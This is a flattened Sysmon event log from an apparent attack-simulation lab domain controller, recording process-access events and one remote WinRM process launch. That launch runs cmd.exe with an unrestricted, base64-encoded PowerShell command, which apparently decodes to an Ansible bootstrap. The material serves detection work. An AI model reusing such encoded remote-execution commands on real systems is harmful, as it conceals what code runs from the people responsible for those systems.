13:52:25.852{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000324Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.852{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000323Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.852{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000322Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.852{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000321Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.852{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000320Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.852{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000319Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.852{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000318Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.852{10ACEC4A-83AA-5FCF-0500-000000009001}640760C:\Windows\system32\csrss.exe{10ACEC4A-8519-5FCF-D202-000000009001}4392C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000317Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.852{10ACEC4A-8519-5FCF-D002-000000009001}45764648C:\Windows\system32\WinrsHost.exe{10ACEC4A-8519-5FCF-D202-000000009001}4392C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x8000000000000000316Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.861{10ACEC4A-8519-5FCF-D202-000000009001}4392C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0AC:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8519-5FCF-C3B8-100000000000}0x10b8c30HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-8519-5FCF-D002-000000009001}4576C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x8000000000000000315Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.852{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000314Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.852{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000313Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.852{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000312Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.852{10ACEC4A-83B9-5FCF-1400-000000009001}13281444C:\Windows\system32\svchost.exe{10ACEC4A-8519-5FCF-D002-000000009001}4576C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x8000000000000000311Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.837{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8519-5FCF-D002-000000009001}4576C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000310Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.821{10ACEC4A-8519-5FCF-D102-000000009001}48362632C:\Windows\system32\conhost.exe{10ACEC4A-8519-5FCF-D002-000000009001}4576C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000309Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.821{10ACEC4A-83AA-5FCF-0500-000000009001}640760C:\Windows\system32\csrss.exe{10ACEC4A-8519-5FCF-D102-000000009001}4836C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000308Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.821{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000307Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.821{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000306Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.821{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000305Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 